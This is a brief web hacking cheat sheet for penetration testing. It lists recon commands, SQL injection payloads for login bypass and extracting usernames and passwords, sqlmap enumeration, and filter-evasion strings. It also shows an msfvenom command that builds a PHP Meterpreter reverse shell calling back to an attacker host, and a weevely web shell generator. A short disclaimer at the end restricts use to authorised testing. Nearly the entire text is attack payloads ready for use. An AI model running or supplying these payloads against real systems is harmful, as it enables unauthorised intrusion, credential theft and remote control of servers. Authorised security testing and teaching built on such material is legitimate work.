Web Hacking Cheat Sheet

Essential techniques for web application penetration testing

Web Server Reconnaissance

  • nikto -h [HOST] -Tuning x

    Find default content on the web server

  • nmap -T4 -A -v [HOST]

    Port and service discovery scan

  • whatweb [HOST]

    Identify web technologies and frameworks

  • gobuster dir -u [HOST] -w [DICTIONARY]

    Enumerate hidden files and directories

SQL Injection Techniques

  • ' or 1=1--

    Basic login bypass attempt

  • blah' UNION SELECT username, password from users --

    Extract user credentials

  • sqlmap -u [HOST] --cookie=[COOKIE] --dbs

    Automated database enumeration

  • 1 OR ascii(lower(substring((USER),1,1)))=97

    Blind SQL injection character extraction

Web Payload Generation

  • msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444

    Create PHP Meterpreter payload

  • weevely generate [PASSWORD] [FILE]

    Generate web shell

  • wpscan --url [HOST] --plugins-detection aggressive

    WordPress vulnerability scanning

Evasion Techniques

  • '/**/UN/**/ION/**/SEL/**/ECT

    SQL injection signature evasion

  • ' OR 'john'='john'

    Bypass simple authentication checks

  • %00' UNION SELECT Password FROM Users

    Null byte injection technique

Important Disclaimer

These techniques are for educational and ethical testing purposes only. Always obtain proper authorization before testing any systems. Unauthorized testing is illegal and unethical.